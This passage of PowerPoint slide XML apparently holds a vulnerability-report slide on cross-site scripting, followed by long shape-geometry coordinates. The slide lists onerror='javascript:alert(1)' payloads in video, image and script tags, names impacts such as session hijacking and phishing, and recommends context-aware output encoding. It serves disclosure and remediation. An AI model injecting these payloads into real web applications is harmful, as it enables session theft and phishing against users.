              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>=1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>=1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>onerror</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>javascript:alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>(1)"&gt;&lt;/video&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>                :&lt;image </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>=1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>=1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>onerror</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>javascript:alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>(1)"&gt;&lt;/image&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>                :&lt;script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>=1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>=1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>onerror</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>javascript:alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>(1)"&gt;&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>PROOF OF CONCEPT: SCREEN SHOTS AND VIDEO IS ATTACHED AT THE END.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>IMPACTS         : There are many different attacks that can be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>leverged</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> through the use of</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>                  Cross site scripting, including:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>                - Hijacking user's active session.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>                - Mounting phishing attacks.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>                - Intercepting data and performing man in the middle attacks.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>REMEDY          : The issue occurs because the browser interprets the input as active HTML</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>                  Or JavaScript. To avoid this, output should be encoded according to the </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>                  Output location and context. And you can just enable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>noscript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> in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710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6AD51EB-971C-4722-9A98-42EB5ABCA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894A7A4-3F4E-414B-97FB-E4C862AD1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663" y="0"/>
            <a:ext cx="8606754" cy="1542197"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst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46439 w 9288370"/>
              <a:gd name="connsiteY6" fmla="*/ 1440261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44869 w 9288370"/>
              <a:gd name="connsiteY0" fmla="*/ 1742117 h 1857909"/>
              <a:gd name="connsiteX1" fmla="*/ 1049 w 9288370"/>
              <a:gd name="connsiteY1" fmla="*/ 1857909 h 1857909"/>
              <a:gd name="connsiteX2" fmla="*/ 370426 w 9288370"/>
              <a:gd name="connsiteY2" fmla="*/ 1702965 h 1857909"/>
              <a:gd name="connsiteX3" fmla="*/ 766051 w 9288370"/>
              <a:gd name="connsiteY3" fmla="*/ 1569826 h 1857909"/>
              <a:gd name="connsiteX4" fmla="*/ 971617 w 9288370"/>
              <a:gd name="connsiteY4" fmla="*/ 1522494 h 1857909"/>
              <a:gd name="connsiteX5" fmla="*/ 1186668 w 9288370"/>
              <a:gd name="connsiteY5" fmla="*/ 1521861 h 1857909"/>
              <a:gd name="connsiteX6" fmla="*/ 1339078 w 9288370"/>
              <a:gd name="connsiteY6" fmla="*/ 1494730 h 1857909"/>
              <a:gd name="connsiteX7" fmla="*/ 1492452 w 9288370"/>
              <a:gd name="connsiteY7" fmla="*/ 1519061 h 1857909"/>
              <a:gd name="connsiteX8" fmla="*/ 1604999 w 9288370"/>
              <a:gd name="connsiteY8" fmla="*/ 1513599 h 1857909"/>
              <a:gd name="connsiteX9" fmla="*/ 1717911 w 9288370"/>
              <a:gd name="connsiteY9" fmla="*/ 1497764 h 1857909"/>
              <a:gd name="connsiteX10" fmla="*/ 1794234 w 9288370"/>
              <a:gd name="connsiteY10" fmla="*/ 1464331 h 1857909"/>
              <a:gd name="connsiteX11" fmla="*/ 2101780 w 9288370"/>
              <a:gd name="connsiteY11" fmla="*/ 1409907 h 1857909"/>
              <a:gd name="connsiteX12" fmla="*/ 2244830 w 9288370"/>
              <a:gd name="connsiteY12" fmla="*/ 1388540 h 1857909"/>
              <a:gd name="connsiteX13" fmla="*/ 2428648 w 9288370"/>
              <a:gd name="connsiteY13" fmla="*/ 1372736 h 1857909"/>
              <a:gd name="connsiteX14" fmla="*/ 2645882 w 9288370"/>
              <a:gd name="connsiteY14" fmla="*/ 1341971 h 1857909"/>
              <a:gd name="connsiteX15" fmla="*/ 2707413 w 9288370"/>
              <a:gd name="connsiteY15" fmla="*/ 1347156 h 1857909"/>
              <a:gd name="connsiteX16" fmla="*/ 2843134 w 9288370"/>
              <a:gd name="connsiteY16" fmla="*/ 1323561 h 1857909"/>
              <a:gd name="connsiteX17" fmla="*/ 2923804 w 9288370"/>
              <a:gd name="connsiteY17" fmla="*/ 1314224 h 1857909"/>
              <a:gd name="connsiteX18" fmla="*/ 2953618 w 9288370"/>
              <a:gd name="connsiteY18" fmla="*/ 1318186 h 1857909"/>
              <a:gd name="connsiteX19" fmla="*/ 2995816 w 9288370"/>
              <a:gd name="connsiteY19" fmla="*/ 1318670 h 1857909"/>
              <a:gd name="connsiteX20" fmla="*/ 3352700 w 9288370"/>
              <a:gd name="connsiteY20" fmla="*/ 1264183 h 1857909"/>
              <a:gd name="connsiteX21" fmla="*/ 3444611 w 9288370"/>
              <a:gd name="connsiteY21" fmla="*/ 1236739 h 1857909"/>
              <a:gd name="connsiteX22" fmla="*/ 3650072 w 9288370"/>
              <a:gd name="connsiteY22" fmla="*/ 1217421 h 1857909"/>
              <a:gd name="connsiteX23" fmla="*/ 3707853 w 9288370"/>
              <a:gd name="connsiteY23" fmla="*/ 1241722 h 1857909"/>
              <a:gd name="connsiteX24" fmla="*/ 3925616 w 9288370"/>
              <a:gd name="connsiteY24" fmla="*/ 1253751 h 1857909"/>
              <a:gd name="connsiteX25" fmla="*/ 3954387 w 9288370"/>
              <a:gd name="connsiteY25" fmla="*/ 1263789 h 1857909"/>
              <a:gd name="connsiteX26" fmla="*/ 3995849 w 9288370"/>
              <a:gd name="connsiteY26" fmla="*/ 1272939 h 1857909"/>
              <a:gd name="connsiteX27" fmla="*/ 4067546 w 9288370"/>
              <a:gd name="connsiteY27" fmla="*/ 1294697 h 1857909"/>
              <a:gd name="connsiteX28" fmla="*/ 4190310 w 9288370"/>
              <a:gd name="connsiteY28" fmla="*/ 1307786 h 1857909"/>
              <a:gd name="connsiteX29" fmla="*/ 4230008 w 9288370"/>
              <a:gd name="connsiteY29" fmla="*/ 1303546 h 1857909"/>
              <a:gd name="connsiteX30" fmla="*/ 4575478 w 9288370"/>
              <a:gd name="connsiteY30" fmla="*/ 1261726 h 1857909"/>
              <a:gd name="connsiteX31" fmla="*/ 4650026 w 9288370"/>
              <a:gd name="connsiteY31" fmla="*/ 1265798 h 1857909"/>
              <a:gd name="connsiteX32" fmla="*/ 4792008 w 9288370"/>
              <a:gd name="connsiteY32" fmla="*/ 1243899 h 1857909"/>
              <a:gd name="connsiteX33" fmla="*/ 4954126 w 9288370"/>
              <a:gd name="connsiteY33" fmla="*/ 1204617 h 1857909"/>
              <a:gd name="connsiteX34" fmla="*/ 5309678 w 9288370"/>
              <a:gd name="connsiteY34" fmla="*/ 1128278 h 1857909"/>
              <a:gd name="connsiteX35" fmla="*/ 5474724 w 9288370"/>
              <a:gd name="connsiteY35" fmla="*/ 1091167 h 1857909"/>
              <a:gd name="connsiteX36" fmla="*/ 5612132 w 9288370"/>
              <a:gd name="connsiteY36" fmla="*/ 1051509 h 1857909"/>
              <a:gd name="connsiteX37" fmla="*/ 5776618 w 9288370"/>
              <a:gd name="connsiteY37" fmla="*/ 1053037 h 1857909"/>
              <a:gd name="connsiteX38" fmla="*/ 5785786 w 9288370"/>
              <a:gd name="connsiteY38" fmla="*/ 1051213 h 1857909"/>
              <a:gd name="connsiteX39" fmla="*/ 5829381 w 9288370"/>
              <a:gd name="connsiteY39" fmla="*/ 1046878 h 1857909"/>
              <a:gd name="connsiteX40" fmla="*/ 5943596 w 9288370"/>
              <a:gd name="connsiteY40" fmla="*/ 1043237 h 1857909"/>
              <a:gd name="connsiteX41" fmla="*/ 5985730 w 9288370"/>
              <a:gd name="connsiteY41" fmla="*/ 1035396 h 1857909"/>
              <a:gd name="connsiteX42" fmla="*/ 6103109 w 9288370"/>
              <a:gd name="connsiteY42" fmla="*/ 1019019 h 1857909"/>
              <a:gd name="connsiteX43" fmla="*/ 6222406 w 9288370"/>
              <a:gd name="connsiteY43" fmla="*/ 985341 h 1857909"/>
              <a:gd name="connsiteX44" fmla="*/ 6598672 w 9288370"/>
              <a:gd name="connsiteY44" fmla="*/ 902062 h 1857909"/>
              <a:gd name="connsiteX45" fmla="*/ 6766149 w 9288370"/>
              <a:gd name="connsiteY45" fmla="*/ 846132 h 1857909"/>
              <a:gd name="connsiteX46" fmla="*/ 6886312 w 9288370"/>
              <a:gd name="connsiteY46" fmla="*/ 781877 h 1857909"/>
              <a:gd name="connsiteX47" fmla="*/ 7006457 w 9288370"/>
              <a:gd name="connsiteY47" fmla="*/ 699758 h 1857909"/>
              <a:gd name="connsiteX48" fmla="*/ 7231643 w 9288370"/>
              <a:gd name="connsiteY48" fmla="*/ 640778 h 1857909"/>
              <a:gd name="connsiteX49" fmla="*/ 7363123 w 9288370"/>
              <a:gd name="connsiteY49" fmla="*/ 593682 h 1857909"/>
              <a:gd name="connsiteX50" fmla="*/ 7588368 w 9288370"/>
              <a:gd name="connsiteY50" fmla="*/ 531129 h 1857909"/>
              <a:gd name="connsiteX51" fmla="*/ 7782741 w 9288370"/>
              <a:gd name="connsiteY51" fmla="*/ 455936 h 1857909"/>
              <a:gd name="connsiteX52" fmla="*/ 7952094 w 9288370"/>
              <a:gd name="connsiteY52" fmla="*/ 409302 h 1857909"/>
              <a:gd name="connsiteX53" fmla="*/ 8231938 w 9288370"/>
              <a:gd name="connsiteY53" fmla="*/ 259259 h 1857909"/>
              <a:gd name="connsiteX54" fmla="*/ 8428864 w 9288370"/>
              <a:gd name="connsiteY54" fmla="*/ 208471 h 1857909"/>
              <a:gd name="connsiteX55" fmla="*/ 8616510 w 9288370"/>
              <a:gd name="connsiteY55" fmla="*/ 161973 h 1857909"/>
              <a:gd name="connsiteX56" fmla="*/ 8826766 w 9288370"/>
              <a:gd name="connsiteY56" fmla="*/ 152111 h 1857909"/>
              <a:gd name="connsiteX57" fmla="*/ 8917647 w 9288370"/>
              <a:gd name="connsiteY57" fmla="*/ 112232 h 1857909"/>
              <a:gd name="connsiteX58" fmla="*/ 9182272 w 9288370"/>
              <a:gd name="connsiteY58" fmla="*/ 37171 h 1857909"/>
              <a:gd name="connsiteX59" fmla="*/ 9232990 w 9288370"/>
              <a:gd name="connsiteY59" fmla="*/ 24074 h 1857909"/>
              <a:gd name="connsiteX60" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY60" fmla="*/ 0 h 1857909"/>
              <a:gd name="connsiteX61" fmla="*/ 0 w 9288370"/>
              <a:gd name="connsiteY61" fmla="*/ 0 h 1857909"/>
              <a:gd name="connsiteX62" fmla="*/ 44869 w 9288370"/>
              <a:gd name="connsiteY62" fmla="*/ 1742117 h 1857909"/>
              <a:gd name="connsiteX0" fmla="*/ 8158 w 9288370"/>
              <a:gd name="connsiteY0" fmla="*/ 1671666 h 1857909"/>
              <a:gd name="connsiteX1" fmla="*/ 1049 w 9288370"/>
              <a:gd name="connsiteY1" fmla="*/ 1857909 h 1857909"/>
              <a:gd name="connsiteX2" fmla="*/ 370426 w 9288370"/>
              <a:gd name="connsiteY2" fmla="*/ 1702965 h 1857909"/>
              <a:gd name="connsiteX3" fmla="*/ 766051 w 9288370"/>
              <a:gd name="connsiteY3" fmla="*/ 1569826 h 1857909"/>
              <a:gd name="connsiteX4" fmla="*/ 971617 w 9288370"/>
              <a:gd name="connsiteY4" fmla="*/ 1522494 h 1857909"/>
              <a:gd name="connsiteX5" fmla="*/ 1186668 w 9288370"/>
              <a:gd name="connsiteY5" fmla="*/ 1521861 h 1857909"/>
              <a:gd name="connsiteX6" fmla="*/ 1339078 w 9288370"/>
              <a:gd name="connsiteY6" fmla="*/ 1494730 h 1857909"/>
              <a:gd name="connsiteX7" fmla="*/ 1492452 w 9288370"/>
              <a:gd name="connsiteY7" fmla="*/ 1519061 h 1857909"/>
              <a:gd name="connsiteX8" fmla="*/ 1604999 w 9288370"/>
              <a:gd name="connsiteY8" fmla="*/ 1513599 h 1857909"/>
              <a:gd name="connsiteX9" fmla="*/ 1717911 w 9288370"/>
              <a:gd name="connsiteY9" fmla="*/ 1497764 h 1857909"/>
              <a:gd name="connsiteX10" fmla="*/ 1794234 w 9288370"/>
              <a:gd name="connsiteY10" fmla="*/ 1464331 h 1857909"/>
              <a:gd name="connsiteX11" fmla="*/ 2101780 w 9288370"/>
              <a:gd name="connsiteY11" fmla="*/ 1409907 h 1857909"/>
              <a:gd name="connsiteX12" fmla="*/ 2244830 w 9288370"/>
              <a:gd name="connsiteY12" fmla="*/ 1388540 h 1857909"/>
              <a:gd name="connsiteX13" fmla="*/ 2428648 w 9288370"/>
              <a:gd name="connsiteY13" fmla="*/ 1372736 h 1857909"/>
              <a:gd name="connsiteX14" fmla="*/ 2645882 w 9288370"/>
              <a:gd name="connsiteY14" fmla="*/ 1341971 h 1857909"/>
              <a:gd name="connsiteX15" fmla="*/ 2707413 w 9288370"/>
              <a:gd name="connsiteY15" fmla="*/ 1347156 h 1857909"/>
              <a:gd name="connsiteX16" fmla="*/ 2843134 w 9288370"/>
              <a:gd name="connsiteY16" fmla="*/ 1323561 h 1857909"/>
              <a:gd name="connsiteX17" fmla="*/ 2923804 w 9288370"/>
              <a:gd name="connsiteY17" fmla="*/ 1314224 h 1857909"/>
              <a:gd name="connsiteX18" fmla="*/ 2953618 w 9288370"/>
              <a:gd name="connsiteY18" fmla="*/ 1318186 h 1857909"/>
              <a:gd name="connsiteX19" fmla="*/ 2995816 w 9288370"/>
              <a:gd name="connsiteY19" fmla="*/ 1318670 h 1857909"/>
              <a:gd name="connsiteX20" fmla="*/ 3352700 w 9288370"/>
              <a:gd name="connsiteY20" fmla="*/ 1264183 h 1857909"/>
              <a:gd name="connsiteX21" fmla="*/ 3444611 w 9288370"/>
              <a:gd name="connsiteY21" fmla="*/ 1236739 h 1857909"/>
              <a:gd name="connsiteX22" fmla="*/ 3650072 w 9288370"/>
              <a:gd name="connsiteY22" fmla="*/ 1217421 h 1857909"/>
              <a:gd name="connsiteX23" fmla="*/ 3707853 w 9288370"/>
              <a:gd name="connsiteY23" fmla="*/ 1241722 h 1857909"/>
              <a:gd name="connsiteX24" fmla="*/ 3925616 w 9288370"/>
              <a:gd name="connsiteY24" fmla="*/ 1253751 h 1857909"/>
              <a:gd name="connsiteX25" fmla="*/ 3954387 w 9288370"/>
              <a:gd name="connsiteY25" fmla="*/ 1263789 h 1857909"/>
              <a:gd name="connsiteX26" fmla="*/ 3995849 w 9288370"/>
              <a:gd name="connsiteY26" fmla="*/ 1272939 h 1857909"/>
              <a:gd name="connsiteX27" fmla="*/ 4067546 w 9288370"/>
              <a:gd name="connsiteY27" fmla="*/ 1294697 h 1857909"/>
              <a:gd name="connsiteX28" fmla="*/ 4190310 w 9288370"/>
              <a:gd name="connsiteY28" fmla="*/ 1307786 h 1857909"/>
              <a:gd name="connsiteX29" fmla="*/ 4230008 w 9288370"/>
              <a:gd name="connsiteY29" fmla="*/ 1303546 h 1857909"/>
              <a:gd name="connsiteX30" fmla="*/ 4575478 w 9288370"/>
              <a:gd name="connsiteY30" fmla="*/ 1261726 h 1857909"/>
              <a:gd name="connsiteX31" fmla="*/ 4650026 w 9288370"/>
              <a:gd name="connsiteY31" fmla="*/ 1265798 h 1857909"/>
              <a:gd name="connsiteX32" fmla="*/ 4792008 w 9288370"/>
              <a:gd name="connsiteY32" fmla="*/ 1243899 h 1857909"/>
              <a:gd name="connsiteX33" fmla="*/ 4954126 w 9288370"/>
              <a:gd name="connsiteY33" fmla="*/ 1204617 h 1857909"/>
              <a:gd name="connsiteX34" fmla="*/ 5309678 w 9288370"/>
              <a:gd name="connsiteY34" fmla="*/ 1128278 h 1857909"/>
              <a:gd name="connsiteX35" fmla="*/ 5474724 w 9288370"/>
              <a:gd name="connsiteY35" fmla="*/ 1091167 h 1857909"/>
              <a:gd name="connsiteX36" fmla="*/ 5612132 w 9288370"/>
              <a:gd name="connsiteY36" fmla="*/ 1051509 h 1857909"/>
              <a:gd name="connsiteX37" fmla="*/ 5776618 w 9288370"/>
              <a:gd name="connsiteY37" fmla="*/ 1053037 h 1857909"/>
              <a:gd name="connsiteX38" fmla="*/ 5785786 w 9288370"/>
              <a:gd name="connsiteY38" fmla="*/ 1051213 h 1857909"/>
              <a:gd name="connsiteX39" fmla="*/ 5829381 w 9288370"/>
              <a:gd name="connsiteY39" fmla="*/ 1046878 h 1857909"/>
              <a:gd name="connsiteX40" fmla="*/ 5943596 w 9288370"/>
              <a:gd name="connsiteY40" fmla="*/ 1043237 h 1857909"/>
              <a:gd name="connsiteX41" fmla="*/ 5985730 w 9288370"/>
              <a:gd name="connsiteY41" fmla="*/ 1035396 h 1857909"/>
              <a:gd name="connsiteX42" fmla="*/ 6103109 w 9288370"/>
              <a:gd name="connsiteY42" fmla="*/ 1019019 h 1857909"/>
              <a:gd name="connsiteX43" fmla="*/ 6222406 w 9288370"/>
              <a:gd name="connsiteY43" fmla="*/ 985341 h 1857909"/>
              <a:gd name="connsiteX44" fmla="*/ 6598672 w 9288370"/>
              <a:gd name="connsiteY44" fmla="*/ 902062 h 1857909"/>
              <a:gd name="connsiteX45" fmla="*/ 6766149 w 9288370"/>
              <a:gd name="connsiteY45" fmla="*/ 846132 h 1857909"/>
              <a:gd name="connsiteX46" fmla="*/ 6886312 w 9288370"/>
              <a:gd name="connsiteY46" fmla="*/ 781877 h 1857909"/>
              <a:gd name="connsiteX47" fmla="*/ 7006457 w 9288370"/>
              <a:gd name="connsiteY47" fmla="*/ 699758 h 1857909"/>
              <a:gd name="connsiteX48" fmla="*/ 7231643 w 9288370"/>
              <a:gd name="connsiteY48" fmla="*/ 640778 h 1857909"/>
              <a:gd name="connsiteX49" fmla="*/ 7363123 w 9288370"/>
              <a:gd name="connsiteY49" fmla="*/ 593682 h 1857909"/>
              <a:gd name="connsiteX50" fmla="*/ 7588368 w 9288370"/>
              <a:gd name="connsiteY50" fmla="*/ 531129 h 1857909"/>
              <a:gd name="connsiteX51" fmla="*/ 7782741 w 9288370"/>
              <a:gd name="connsiteY51" fmla="*/ 455936 h 1857909"/>
              <a:gd name="connsiteX52" fmla="*/ 7952094 w 9288370"/>
              <a:gd name="connsiteY52" fmla="*/ 409302 h 1857909"/>
              <a:gd name="connsiteX53" fmla="*/ 8231938 w 9288370"/>
              <a:gd name="connsiteY53" fmla="*/ 259259 h 1857909"/>
              <a:gd name="connsiteX54" fmla="*/ 8428864 w 9288370"/>
              <a:gd name="connsiteY54" fmla="*/ 208471 h 1857909"/>
              <a:gd name="connsiteX55" fmla="*/ 8616510 w 9288370"/>
              <a:gd name="connsiteY55" fmla="*/ 161973 h 1857909"/>
              <a:gd name="connsiteX56" fmla="*/ 8826766 w 9288370"/>
              <a:gd name="connsiteY56" fmla="*/ 152111 h 1857909"/>
              <a:gd name="connsiteX57" fmla="*/ 8917647 w 9288370"/>
              <a:gd name="connsiteY57" fmla="*/ 112232 h 1857909"/>
              <a:gd name="connsiteX58" fmla="*/ 9182272 w 9288370"/>
              <a:gd name="connsiteY58" fmla="*/ 37171 h 1857909"/>
              <a:gd name="connsiteX59" fmla="*/ 9232990 w 9288370"/>
              <a:gd name="connsiteY59" fmla="*/ 24074 h 1857909"/>
              <a:gd name="connsiteX60" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY60" fmla="*/ 0 h 1857909"/>
              <a:gd name="connsiteX61" fmla="*/ 0 w 9288370"/>
              <a:gd name="connsiteY61" fmla="*/ 0 h 1857909"/>
              <a:gd name="connsiteX62" fmla="*/ 8158 w 9288370"/>
              <a:gd name="connsiteY62" fmla="*/ 1671666 h 1857909"/>
              <a:gd name="connsiteX0" fmla="*/ 8158 w 9288370"/>
              <a:gd name="connsiteY0" fmla="*/ 1671666 h 1721151"/>
              <a:gd name="connsiteX1" fmla="*/ 66313 w 9288370"/>
              <a:gd name="connsiteY1" fmla="*/ 1721151 h 1721151"/>
              <a:gd name="connsiteX2" fmla="*/ 370426 w 9288370"/>
              <a:gd name="connsiteY2" fmla="*/ 1702965 h 1721151"/>
              <a:gd name="connsiteX3" fmla="*/ 766051 w 9288370"/>
              <a:gd name="connsiteY3" fmla="*/ 1569826 h 1721151"/>
              <a:gd name="connsiteX4" fmla="*/ 971617 w 9288370"/>
              <a:gd name="connsiteY4" fmla="*/ 1522494 h 1721151"/>
              <a:gd name="connsiteX5" fmla="*/ 1186668 w 9288370"/>
              <a:gd name="connsiteY5" fmla="*/ 1521861 h 1721151"/>
              <a:gd name="connsiteX6" fmla="*/ 1339078 w 9288370"/>
              <a:gd name="connsiteY6" fmla="*/ 1494730 h 1721151"/>
              <a:gd name="connsiteX7" fmla="*/ 1492452 w 9288370"/>
              <a:gd name="connsiteY7" fmla="*/ 1519061 h 1721151"/>
              <a:gd name="connsiteX8" fmla="*/ 1604999 w 9288370"/>
              <a:gd name="connsiteY8" fmla="*/ 1513599 h 1721151"/>
              <a:gd name="connsiteX9" fmla="*/ 1717911 w 9288370"/>
              <a:gd name="connsiteY9" fmla="*/ 1497764 h 1721151"/>
              <a:gd name="connsiteX10" fmla="*/ 1794234 w 9288370"/>
              <a:gd name="connsiteY10" fmla="*/ 1464331 h 1721151"/>
              <a:gd name="connsiteX11" fmla="*/ 2101780 w 9288370"/>
              <a:gd name="connsiteY11" fmla="*/ 1409907 h 1721151"/>
              <a:gd name="connsiteX12" fmla="*/ 2244830 w 9288370"/>
              <a:gd name="connsiteY12" fmla="*/ 1388540 h 1721151"/>
              <a:gd name="connsiteX13" fmla="*/ 2428648 w 9288370"/>
              <a:gd name="connsiteY13" fmla="*/ 1372736 h 1721151"/>
              <a:gd name="connsiteX14" fmla="*/ 2645882 w 9288370"/>
              <a:gd name="connsiteY14" fmla="*/ 1341971 h 1721151"/>
              <a:gd name="connsiteX15" fmla="*/ 2707413 w 9288370"/>
              <a:gd name="connsiteY15" fmla="*/ 1347156 h 1721151"/>
              <a:gd name="connsiteX16" fmla="*/ 2843134 w 9288370"/>
              <a:gd name="connsiteY16" fmla="*/ 1323561 h 1721151"/>
              <a:gd name="connsiteX17" fmla="*/ 2923804 w 9288370"/>
              <a:gd name="connsiteY17" fmla="*/ 1314224 h 1721151"/>
              <a:gd name="connsiteX18" fmla="*/ 2953618 w 9288370"/>
              <a:gd name="connsiteY18" fmla="*/ 1318186 h 1721151"/>
              <a:gd name="connsiteX19" fmla="*/ 2995816 w 9288370"/>
              <a:gd name="connsiteY19" fmla="*/ 1318670 h 1721151"/>
              <a:gd name="connsiteX20" fmla="*/ 3352700 w 9288370"/>
              <a:gd name="connsiteY20" fmla="*/ 1264183 h 1721151"/>
              <a:gd name="connsiteX21" fmla="*/ 3444611 w 9288370"/>
              <a:gd name="connsiteY21" fmla="*/ 1236739 h 1721151"/>
              <a:gd name="connsiteX22" fmla="*/ 3650072 w 9288370"/>
              <a:gd name="connsiteY22" fmla="*/ 1217421 h 1721151"/>
              <a:gd name="connsiteX23" fmla="*/ 3707853 w 9288370"/>
              <a:gd name="connsiteY23" fmla="*/ 1241722 h 1721151"/>
              <a:gd name="connsiteX24" fmla="*/ 3925616 w 9288370"/>
              <a:gd name="connsiteY24" fmla="*/ 1253751 h 1721151"/>
              <a:gd name="connsiteX25" fmla="*/ 3954387 w 9288370"/>
              <a:gd name="connsiteY25" fmla="*/ 1263789 h 1721151"/>
              <a:gd name="connsiteX26" fmla="*/ 3995849 w 9288370"/>
              <a:gd name="connsiteY26" fmla="*/ 1272939 h 1721151"/>
              <a:gd name="connsiteX27" fmla="*/ 4067546 w 9288370"/>
              <a:gd name="connsiteY27" fmla="*/ 1294697 h 1721151"/>
              <a:gd name="connsiteX28" fmla="*/ 4190310 w 9288370"/>
              <a:gd name="connsiteY28" fmla="*/ 1307786 h 1721151"/>
              <a:gd name="connsiteX29" fmla="*/ 4230008 w 9288370"/>
              <a:gd name="connsiteY29" fmla="*/ 1303546 h 1721151"/>
              <a:gd name="connsiteX30" fmla="*/ 4575478 w 9288370"/>
              <a:gd name="connsiteY30" fmla="*/ 1261726 h 1721151"/>
